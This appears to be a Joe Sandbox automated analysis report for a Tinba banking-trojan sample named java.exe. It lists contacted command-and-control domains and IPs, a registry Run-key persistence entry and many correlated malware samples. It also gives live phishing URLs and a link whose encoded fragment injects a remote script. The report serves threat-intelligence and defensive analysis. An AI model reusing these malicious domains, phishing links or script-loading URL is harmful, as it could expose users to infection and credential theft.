                                                                                                                      https://outlook.office.com/SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://login.windows.localsvchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://www.ng.comSearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/SearchApp.exe, 0000000B.00000000.1804409730.0000024B54E44000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://api.msn.com/qexplorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://graph.windows.net/SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://substrate.office.com/search/apiSearchApp.exe, 0000000B.00000000.1769556330.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://xsts.auth.xboxlive.commSearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://loki.delve.office.com/apiSearchApp.exe, 0000000B.00000000.1769556330.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://assets.activity.windows.comersvchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmSearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://reactjs.org/docs/error-decoder.html?invariant=SearchApp.exe, 0000000B.00000000.1803975206.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://assets.activity.windows.comssvchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://activity.windows.comtsvchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://substrate.office.com/search/api/v2/queryetItemChttps://substrate.office365.us/search/api/v2/SearchApp.exe, 0000000B.00000000.1811664629.0000024B5530E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://login.windows.local/svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://aka.ms/Vh5j3kexplorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000003.00000002.3032615601.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://outlook.office365.com/mail/deeplink/attachment/SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://fb.me/react-polyfillsSearchApp.exe, 0000000B.00000000.1803975206.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://api.msn.com/explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://assets.activity.windows.comsvchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://activity.windows.comsvchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://excel.office.comcpStartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
216.218.185.162 | vcklmnnejwxx.pw | United States | 6939 | HURRICANEUS | true
45.77.249.79 | uyhgqunqkxnx.pw | United States | 20473 | AS-CHOOPAUS | true
173.222.162.32 | unknown | United States | 35994 | AKAMAI-ASUS | false
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1366396
Start date and time: 2023-12-22 21:30:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 35
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: java.exe
Detection: MAL
Classification: mal100.bank.expl.evad.winEXE@10/12@14/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 123
• Number of non-executed functions: 68
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 104.91.175.14, 104.91.175.60, 104.91.175.23, 72.21.81.240
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: java.exe
Time      Type             Description
20:31:00  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run F90F00A9 C:\Users\user\AppData\Roaming\F90F00A9\bin.exe
20:31:09  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run F90F00A9 C:\Users\user\AppData\Roaming\F90F00A9\bin.exe
21:30:53  API Interceptor  980x Sleep call for process: explorer.exe modified
21:31:00  API Interceptor  1x Sleep call for process: winver.exe modified
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    216.218.185.162PrintWiz.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • pxscpwnnqujq.net/el0hjkd76ghs65dhj0it/
                                                                                                                                                                                    java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • cmnsgscccrej.pw/EiDQjNbWEQ/
                                                                                                                                                                                    3G36K54KKw.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • ve0t182er814kok.cc/vet0up7gj67sdhjd17up0er/
                                                                                                                                                                                    http://hbjtorutqkl.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • hbjtorutqkl.org/
                                                                                                                                                                                    http://www.paypr.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • www.paypr.com/
                                                                                                                                                                                    Fxj6eiNUQ1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • mypark.cc/qa/
                                                                                                                                                                                    1boDHMvtCl.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                                    N7B5dyjbIS.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                                    bhiDwU4Geh.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • qvvksmeemfgd.com/spam/
                                                                                                                                                                                    K73CgOgVZ9.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • qvvksmeemfgd.com/spam/
                                                                                                                                                                                    I90gcqKK3m.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • ggvruxovlbrm.com/spam/
                                                                                                                                                                                    KlNXUPV2V9.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • qvvksmeemfgd.com/spam/
                                                                                                                                                                                    26cCgegATh.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                                    4jNfjcMzST.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                                    PFubud554p.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                                    xST04RvuDH.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                                    rTv7jUz1P5.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                                    6phPAtxcUR.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • cmnsgscccrej.pw/EiDQjNbWEQ/
                                                                                                                                                                                    IPwhmF3OZ3.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                                    sZ8q0q3VNz.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                    • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                                    173.222.162.32java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                      p2pWin.exeGet hashmaliciousPetya / NotPetya, MimikatzBrowse
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        mfueeimvyrsp.pwsNZuv8N8pu.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        C08nibNrTH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        3VPzpw8aQd.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        hyyjqrWo12.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        ph0Z652SJT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        fccfxejgtpqb.pw3VPzpw8aQd.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        hyyjqrWo12.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        cmnsgscccrej.pwjava.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        6phPAtxcUR.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        deOHDeSfAr.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        o2tow8Yiis.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        Mb5ahRznK0.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        s81nbT3Zep.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        sNZuv8N8pu.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        jq7Pr9KzM4.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        tchXcDTqcH.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        C08nibNrTH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        FkwKWgolSq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        jinqBxHe8g.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        3VPzpw8aQd.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        hyyjqrWo12.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
                                                                                                                                                                                        ZI1t52NPYC.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                        • 216.218.185.162
| | ph0Z652SJT.exe | malicious | Unknown | 216.218.185.162 |
| | XYLMAkG1gD.exe | malicious | Unknown | 216.218.185.162 |
| vcklmnnejwxx.pw | java.exe | malicious | Tinba | 216.218.185.162 |
| | 1boDHMvtCl.exe | malicious | Tinba | 216.218.185.162 |
| | N7B5dyjbIS.exe | malicious | Tinba | 216.218.185.162 |
| | PFubud554p.exe | malicious | Tinba | 216.218.185.162 |
| | 6phPAtxcUR.exe | malicious | Tinba | 216.218.185.162 |
| | IPwhmF3OZ3.exe | malicious | Tinba | 216.218.185.162 |
| | sZ8q0q3VNz.exe | malicious | Tinba | 216.218.185.162 |
| | deOHDeSfAr.exe | malicious | Tinba | 216.218.185.162 |
| | o2tow8Yiis.exe | malicious | Tinba | 216.218.185.162 |
| | S6bS8zCitm.exe | malicious | Tinba | 216.218.185.162 |
| | eddLVK4Ak8.exe | malicious | Tinba | 216.218.185.162 |
| | oaCC6gQGMe.exe | malicious | Tinba | 216.218.185.162 |
| | Mb5ahRznK0.exe | malicious | Tinba | 216.218.185.162 |
| | cBn0fkHo3x.exe | malicious | Tinba | 216.218.185.162 |
| | s81nbT3Zep.exe | malicious | Tinba | 216.218.185.162 |
| | tHgi7eqSU8.exe | malicious | Tinba | 216.218.185.162 |
| | Se7RDF9xyE.exe | malicious | Tinba | 216.218.185.162 |
| | i3kLBdupx2.exe | malicious | Tinba | 216.218.185.162 |
| | sNZuv8N8pu.exe | malicious | Tinba | 216.218.185.162 |
| | 5ylKBM0tAz.exe | malicious | Tinba | 216.218.185.162 |
| wwgfyvvdtmeq.pw | sNZuv8N8pu.exe | malicious | Tinba | 216.218.185.162 |
| | 3VPzpw8aQd.exe | malicious | Tinba | 216.218.185.162 |
| | hyyjqrWo12.exe | malicious | Tinba | 216.218.185.162 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| AS-CHOOPAUS | https://jspen.co/#JTNDJTczJTYzJTcyJTY5JTcwJTc0JTIwJTczJTcyJTYzJTNEJTIyJTY4JTc0JTc0JTcwJTczJTNBJTJGJTJGJTYxJTcwJTcwJTczJTY1JTZFJTY0JTY3JTcyJTY5JTY0JTM5JTMzJTM4JTM3JTJFJTYxJTdBJTc1JTcyJTY1JTY2JTY0JTJFJTZFJTY1JTc0JTJGJTc1JTcwJTY0JTYxJTc0JTY1JTczJTJFJTZBJTczJTIyJTNFJTIwJTNDJTJGJTczJTYzJTcyJTY5JTcwJTc0JTNF | malicious | Unknown | 66.42.84.244 |
| | file.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader | 155.138.149.238 |
| | cum.z.dll | malicious | PikaBot | 107.191.56.230 |
| | TransferiXX103XXDMT231151342.docx.doc | malicious | Unknown | 149.28.109.84 |
| | TransferiXX103XXDMT231151342.docx.doc | malicious | Unknown | 149.28.109.84 |
| | Y3b5c7qTOT.exe | malicious | Gurcu Stealer | 104.238.189.120 |
| | https://storage.googleapis.com/fedexfr/hreflj.html#?Z289MSZzMT0xNzYyOTM4JnMyPTM3NjI4MTYzOSZzMz1HTEI= | malicious | Phisher | 66.42.117.113 |
| | XEXPJu3n0v.exe | malicious | BazaLoader | 216.128.135.246 |
| | XEXPJu3n0v.exe | malicious | BazaLoader | 216.128.135.246 |
| | Qzb.js | malicious | Unknown | 45.77.85.150 |
| | Qzb.js | malicious | Unknown | 45.77.85.150 |
| | https://freelancerden.com/zinv3z/?74937581 | malicious | Unknown | 45.77.85.150 |
| | Notevu.js | malicious | Unknown | 45.77.85.150 |
| | Notevu.js | malicious | Unknown | 45.77.85.150 |
| | Oom.js | malicious | Unknown | 45.77.85.150 |
| | Oom.js | malicious | Unknown | 45.77.85.150 |
| | x86-20231215-0918.elf | malicious | Mirai | 144.202.77.79 |
| | Noteln.js | malicious | Unknown | 137.220.58.128 |
| | Noteln.js | malicious | Unknown | 137.220.58.128 |
| | 1136-1212-DEC.PDF.exe | malicious | AsyncRAT, zgRAT | 207.246.82.230 |
| HURRICANEUS | Pay-App+for+final+lien+release+requires+your+review.htm | malicious | Unknown | 64.71.144.72 |
| | PrintWiz.exe | malicious | Tinba | 216.218.185.162 |
| | java.exe | malicious | Tinba | 216.218.185.162 |
| | 3G36K54KKw.exe | malicious | Tinba | 216.218.185.162 |
| | imaginebeingarm7.elf | malicious | Mirai, Moobot | 170.199.208.0 |
| | 2YRmJ2lhap.exe | malicious | Unknown | 72.52.84.202 |
| | L8PCdNq0xs.elf | malicious | Mirai | 184.104.188.104 |
| | 22iXhC1ACX.elf | malicious | Mirai | 5.152.182.52 |
| | oBtxppgLWB.elf | malicious | Mirai | 216.218.165.228 |
| | z0r0.x86.elf | malicious | Mirai | 72.14.64.79 |
| | 5aHdc3wOqU.elf | malicious | Mirai | 173.242.57.34 |
| | Ok003hLQXE.elf | malicious | Mirai | 72.14.64.64 |
| | PPh4qGlopz.elf | malicious | Unknown | 184.104.158.219 |
| | QbQ0spd3GB.elf | malicious | Mirai | 209.135.12.122 |
| | zjkV4N6A5M.elf | malicious | Mirai | 65.49.39.198 |
| | 2EDcea0dMU.elf | malicious | Mirai | 65.49.39.187 |
| | shellx86.elf | malicious | Mirai | 64.209.57.27 |
| | https://storage.googleapis.com/ufdufdjsdgssd/sdsdsd.html#76vcehxnjljkp4.pxnSNbPhXqGHed?xlnhhxqyptimqm=vogevumbsrslljMWljdXpvcDAwMDZiMTAwMWJscjAyMDJ1MGEwMjgxMTQzMzRwZA== | malicious | Phisher | 65.49.76.53 |
| | sora.arm.elf | malicious | Mirai | 72.14.64.79 |
| | 5jDiu75EIe.elf | malicious | Mirai, Moobot | 184.104.7.252 |
| AKAMAI-ASUS | WEXTRACT13.EXE.exe | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | 184.51.209.125 |
| | WEXTRACT32.exe | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | 23.58.234.79 |
| | ccsetup401.exe | malicious | Unknown | 184.84.137.50 |
| | wextract.exe | malicious | RisePro Stealer, SmokeLoader, Vidar | 23.61.62.118 |
| | wexctract.exe | malicious | RisePro Stealer, SmokeLoader, Vidar | 104.94.108.105 |
| | FDLrj6GAhj.elf | malicious | Mirai | 23.7.49.162 |
| | XKpsAUCtnp.exe | malicious | Glupteba, Stealc, Vidar | 23.43.173.32 |
| | http://e.mrktl.email/e/tl.php?p=4k1/4k1/rs/ds2y/ry/rs//https://www.docsprefix.com | malicious | HTMLPhisher | 23.221.214.80 |
| | https://guyanachronicle.com/2023/12/15/guyana-maintains-commitment-to-icj-process-in-resolution-of-border-controversy/ | malicious | Unknown | 23.215.200.26 |
| | Quarantined Messages (23).zip | malicious | Unknown | 96.7.192.232 |
| | https://baharat.ma/q99cz/?AOUmbYoGQH8qEHID79hLryfW8V | malicious | Unknown | 23.202.70.77 |
| | gkHZFP0Kbr.exe | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | 184.51.209.125 |
| | qVn2uj3FTs.exe | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | 23.61.62.118 |
| | lqePeeQDVX.exe | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | 184.51.209.125 |
| | https://s-teamg.com/p/wvc-jtrd/vrawqtgf/ | malicious | Unknown | 23.61.62.118 |
| | https://steannconnmunitiy.ru/ | malicious | Unknown | 23.215.201.167 |
                                                                                                                                                                                        https://www.ratuken-card.xixihuahua.com/rms/client/LO0101001.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 23.46.212.66
                                                                                                                                                                                        https://1drv.ms/b/s!Aj_dAsJOtS3GeKVcEaa61wq6boU?e=TSuYkWGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 23.43.173.54
                                                                                                                                                                                        BeSYhza0Q4.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                        • 23.61.62.118
                                                                                                                                                                                        ED1UPpAvQI.exeGet hashmaliciousRisePro Stealer, SmokeLoader, Vidar, zgRATBrowse
                                                                                                                                                                                        • 23.61.62.118
Match | Associated Sample Name / URL | Detection | Threat Name | Context
28a2c9bd18a11de089ef85a160da29e4 | Gadellnet-Thursday December 2023.html | malicious | HTMLPhisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://s1uju.mjt.lu/lnk/Aa0AAHzepRAAAAAAAAAAAdSAuugAAYCsqJEAAAAAACbqRwBlhaUxYsMeMGO3Ro60obYs4n9-6AAkLwY/1/Gmx7uscHQdCNz9WDknuTTg/aHR0cHM6Ly9rdXRla3JvY2suY29t | malicious | HtmlDropper, HTMLPhisher | 173.222.162.32
